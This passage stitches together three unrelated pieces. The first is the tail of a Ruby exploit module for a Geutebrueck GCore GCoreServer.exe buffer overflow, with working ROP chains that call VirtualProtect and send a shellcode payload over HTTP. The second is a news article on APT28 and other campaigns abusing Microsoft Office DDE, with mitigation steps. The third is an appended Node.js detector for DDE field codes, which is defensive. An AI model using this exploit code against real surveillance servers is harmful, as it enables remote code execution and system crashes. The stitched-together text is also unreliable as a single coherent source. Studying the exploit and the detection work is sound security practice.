      # 0x1400ae2ae | POP RDX; RETN
      # 0x...1000 | Value for VP "Size of Memory"
      rop << [0x1400ae2ae].pack('Q<')
      rop << [0x0000000000000400].pack('Q<')

      # 0x14029dc6e: | POP R8; RET
      # 0x...40 | Value for VP "Execute Permissions"
      rop << [0x14029dc6e].pack('Q<')
      rop << [0x0000000000000040].pack('Q<')

      # 0x1400aa030 | POP R9; RET
      # 0x1409AE1A8 is the .data section of gcore
      rop << [0x1400aa030].pack('Q<')
      rop << [0x1409AE1A8].pack('Q<')

      # 0x140b5927a: xor rax, rax ; ret
      rop << [0x140b5927a].pack('Q<')

      # 0x1402ce220 pop rax ; ret
      # 0x140d752b8 | VP Stub IAT Entry
      rop << [0x1402ce220].pack('Q<')
      rop << [0x140d752b8].pack('Q<')

      # 0x1407c6b3b mov rax, qword [rax] ; ret ;
      rop << [0x1407c6b3b].pack('Q<')

      # 0x140989c41 push rax; ret
      rop << [0x140989c41].pack('Q<')

      # 0x1406d684d jmp rsp
      rop << [0x1406d684d].pack('Q<')

      [rop, overwrite, stack_align]

    elsif target.name.include? '1.4.2.37'
      print_status('Preparing ROP chain for target 1.4.2.37!')

      # 0x140cd9759 | add rsp, 0x10 ; ret
      # This is needed because the next 16 bytes are sometimes messed up.
      overwrite = [0x140cd9759].pack('Q<')

      # We have 40 bytes left to align our stack!
      # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations
      # and to restore it.
      # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough.
      # 0x1404f213f: mov edx, esp ; ret
      stack_align << [0x1404f213f].pack('Q<')

      # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value.
      # We pop -XXXXX as \xxxxxxxxx to rax
      # 0x14000efa8 pop rax ; ret
      stack_align << [0x14000efa8].pack('Q<')
      stack_align << [0xFFFFFFFFFFFFF061].pack('Q<')

      # Our value is enough.
      # 0x140cdfe65 | add rax,rdx ; ret
      stack_align << [0x140cdfe65].pack('Q<')

      # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back.
      # 0x140cf3110 | mov rsp, rax ; ..... ; ret
      stack_align << [0x140cf3110].pack('Q<')

      # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9.
      # We want RCX to hold the value for VP Argument "Address of Shellcode"
      # 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ;
      rop << [0x140ccb984].pack('Q<')
      rop << [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aligning with "add rsp, 0x28" ;

      # 0x14008f7ec | POP RDX; RETN
      # 0x...1000 | Value for VP "Size of Memory"
      rop << [0x14008f7ec].pack('Q<')
      rop << [0x0000000000000400].pack('Q<')

      # 0x140a88f81: | POP R8; RET
      # 0x...40 | Value for VP "Execute Permissions"
      rop << [0x140a88f81].pack('Q<')
      rop << [0x0000000000000040].pack('Q<')

      # 0x1400aa030 | POP R9; RET
      # 0x... | Value for VP "Writeable location". Not sure if needed?
      # 0x140FB5000 is the .data section of gcore; let's test with this writable section...
      rop << [0x1400aa030].pack('Q<')
      rop << [0x140FB5000].pack('Q<')

      # 0x140ccea2f: xor rax, rax ; ret
      rop << [0x140ccea2f].pack('Q<')

      # 0x14000efa8 pop rax ; ret
      # 0x140d83268 | VP Stub IAT Entry
      rop << [0x14000efa8].pack('Q<')
      rop << [0x140d83268].pack('Q<')

      # 0x14095b254 mov rax, qword [rax] ; ret ;
      rop << [0x14095b254].pack('Q<')

      # 0x140166c46 push rax; ret
      rop << [0x140166c46].pack('Q<')

      # 0x140cfb98d jmp rsp
      rop << [0x140cfb98d].pack('Q<')

      [rop, overwrite, stack_align]
    else
      print_status('ROP chain for this version not (yet) available or the target is not vulnerable.')
    end
  end

  def exploit
    if target['auto']
      checkcode, target = fingerprint
      fail_with(Failure::NotVulnerable, 'No vulnerable Version detected - exploit aborted.') if checkcode.to_s.include? 'unknown'
      target_rop, target_overwrite, target_stack_align = ropchain(target)
    else
      print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.')
      print_status("Selected version: #{self.target.name}")
      target_rop, target_overwrite, target_stack_align = ropchain(self.target)
    end

    begin
      connect
      print_status('Crafting Exploit...')
      exploit = 'GET /'
      exploit << "\x41" * 200
      exploit << target_rop
      exploit << payload.encoded
      exploit << "\x41" * 1823
      exploit << target_overwrite
      exploit << target_stack_align
      print_status('Exploit ready for sending...')
      sock.put(exploit, 'Timeout' => 20)
      print_status('Exploit sent!')
      buf = sock.get_once || ''
    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}\n#{e.fail_with}")
    ensure
      print_status('Closing socket.')
      disconnect
    end
  end
end

Source: https://packetstormsecurity.com/files/144928/Geutebrueck-GCore-GCoreServer.exe-Buffer-Overflow.html
-
Cybercriminals, including state-sponsored hackers, have started actively exploiting a newly discovered Microsoft Office vulnerability that Microsoft does not consider a security issue and has declined to patch.

Last month, we reported how hackers could leverage a built-in Microsoft Office feature, called Dynamic Data Exchange (DDE), to perform code execution on the targeted device without requiring Macros enabled or memory corruption.

The DDE protocol is one of several methods that Microsoft uses to allow two running applications to share the same data. The protocol is used by thousands of apps, including MS Excel, MS Word, Quattro Pro, and Visual Basic for one-time data transfers and for continuous exchanges for sending updates to one another.

Soon after the details of the DDE attack went public, several reports emerged about various widespread attack campaigns abusing this technique in the wild to target several organisations with malware.

Now, for the first time, this DDE attack technique has been found being leveraged by an Advanced Persistent Threat (APT) hacking group—APT28, which is well known as Fancy Bear and is widely believed to be backed by the Russian government.

Russian Hackers Using New York Terror Attack to Lure Victims

While analyzing a new spear phishing campaign, security researchers discovered that the Fancy Bear hackers have been leveraging the DDE vulnerability since late October, according to a recent report published Tuesday by McAfee researchers.

The campaign involved documents referencing the recent terrorist attack in New York City in an attempt to trick victims into clicking on the malicious documents, which eventually infect their systems with malware.

Since DDE is a legitimate Microsoft feature, most antivirus solutions don't flag any warning or block documents with DDE fields.

Therefore, anyone who clicks on the malicious attachment (with names like SabreGuard2017.docx or IsisAttackInNewYork.docx) inadvertently runs malicious code on his/her computer without any restriction or detection.

Once opened, the document contacts a command-and-control server to install the first stage of the malware, called Seduploader, on victims' machines using PowerShell commands.

Seduploader then profiles prospective victims by pulling basic host information from the infected system to the hackers. If the system is of interest, the attackers later install more fully featured spyware—X-Agent and Sedreco.

This is not the first malware campaign that has been spotted abusing the DDE attack technique. Soon after the details of the DDE attack technique went public, Cisco's Talos threat research group uncovered an attack campaign that was actively exploiting this technique to target several organisations with a fileless remote access trojan called DNSMessenger.

Late last month, researchers discovered a campaign that spread Locky ransomware and the TrickBot banking trojan via Word documents that leveraged the DDE technique.

Another separate malware spam campaign discovered by security researchers was also found distributing Hancitor malware (also known as Chanitor and Tordal) using the Microsoft Office DDE exploit.

Protection Against DDE Malware Attacks

Since Microsoft does not provide any protection against such attacks, you can prevent yourself from falling victim to any malicious document abusing Microsoft's DDE feature by disabling it entirely.

If you use Microsoft Word 2016 or Microsoft Excel 2016, go to Options → Advanced, and then remove the checkmark from "Update automatic links at open", which is listed under the General group on the page.

In MS Excel, you can also consider checking "Ignore other applications that use Dynamic Data Exchange (DDE)."

Moreover, Disable DDEAuto is a Registry file maintained on GitHub that disables the "update links" as well as "embedded files" functionality in MS Office documents when run.

You can detect Office documents abusing the DDE feature via a set of YARA rules for Office Open XML files published by the researchers at NVISO Labs.

However, the best way to protect yourself from such malware attacks is always to be suspicious of uninvited documents sent via email and never click on links inside those documents without adequately verifying the source.

Via thehackernews.com
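As an added example (not code from the article and not NVISO's YARA rules), the following Node script does the simplest form of the detection the article mentions: it takes the word/document.xml part of a .docx (assumed to be extracted already, for instance with unzip -p file.docx word/document.xml), stitches together field instruction text that Word may spread over several <w:instrText> runs, and reports DDE and DDEAUTO field codes. The function names and the sample XML are constructed for this example. Legitimate documents can still carry DDE links (the classic Excel link is one), so a hit is a triage signal rather than a verdict.

```javascript
'use strict';

// Field codes of interest: DDE (link to another application) and DDEAUTO
// (the same link, refreshed automatically when the document is opened).
const DDE_PATTERN = /\bDDE(?:AUTO)?\b/i;

// Field instructions are stored XML-escaped; undo the five predefined entities.
function decodeXmlEntities(text) {
  return text
    .replace(/&quot;/g, '"')
    .replace(/&apos;/g, "'")
    .replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>')
    .replace(/&amp;/g, '&');
}

// Complex fields look like: <w:fldChar begin/> <w:instrText>..</w:instrText>
// (possibly split over several runs) <w:fldChar separate/> result <w:fldChar end/>.
// Matching one run at a time would miss a keyword split across runs, so every
// instrText between one fldChar marker and the next is concatenated. Nested
// fields are flattened into separate instructions, which is enough for a
// keyword scan.
function extractComplexFieldInstructions(xml) {
  const tokenRe = /<w:fldChar\b[^>]*\bw:fldCharType="(begin|separate|end)"[^>]*>|<w:instrText\b[^>]*>([\s\S]*?)<\/w:instrText>/g;
  const fields = [];
  let current = [];
  const flush = () => {
    if (current.length) fields.push(decodeXmlEntities(current.join('')).trim());
    current = [];
  };
  let m;
  while ((m = tokenRe.exec(xml)) !== null) {
    if (m[1] !== undefined) flush(); // begin, separate and end all close the text so far
    else current.push(m[2]);
  }
  flush();
  return fields;
}

// Simple fields keep the whole instruction in one attribute.
function extractSimpleFieldInstructions(xml) {
  const re = /<w:fldSimple\b[^>]*\bw:instr="([^"]*)"/g;
  const fields = [];
  let m;
  while ((m = re.exec(xml)) !== null) fields.push(decodeXmlEntities(m[1]).trim());
  return fields;
}

// Returns every field instruction in the document part that uses DDE or DDEAUTO.
function findDdeFields(documentXml) {
  return [
    ...extractComplexFieldInstructions(documentXml),
    ...extractSimpleFieldInstructions(documentXml),
  ].filter((instr) => DDE_PATTERN.test(instr));
}

// Constructed sample document part: one DDEAUTO field whose keyword is split
// over two runs, plus an ordinary PAGE field that must not be flagged.
const SAMPLE_DOCUMENT_XML = `<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body>
    <w:p>
      <w:r><w:fldChar w:fldCharType="begin"/></w:r>
      <w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>
      <w:r><w:instrText xml:space="preserve">AUTO example.exe &quot;constructed sample&quot; </w:instrText></w:r>
      <w:r><w:fldChar w:fldCharType="separate"/></w:r>
      <w:r><w:t>field result shown to the reader</w:t></w:r>
      <w:r><w:fldChar w:fldCharType="end"/></w:r>
    </w:p>
    <w:p>
      <w:fldSimple w:instr=" PAGE \\* MERGEFORMAT "><w:r><w:t>1</w:t></w:r></w:fldSimple>
    </w:p>
  </w:body>
</w:document>`;

console.log(findDdeFields(SAMPLE_DOCUMENT_XML));
```

To scan a real file, read the extracted word/document.xml with fs.readFileSync and pass its contents to findDdeFields; the same functions apply unchanged to the header, footer and footnote parts of the package, which can also hold fields.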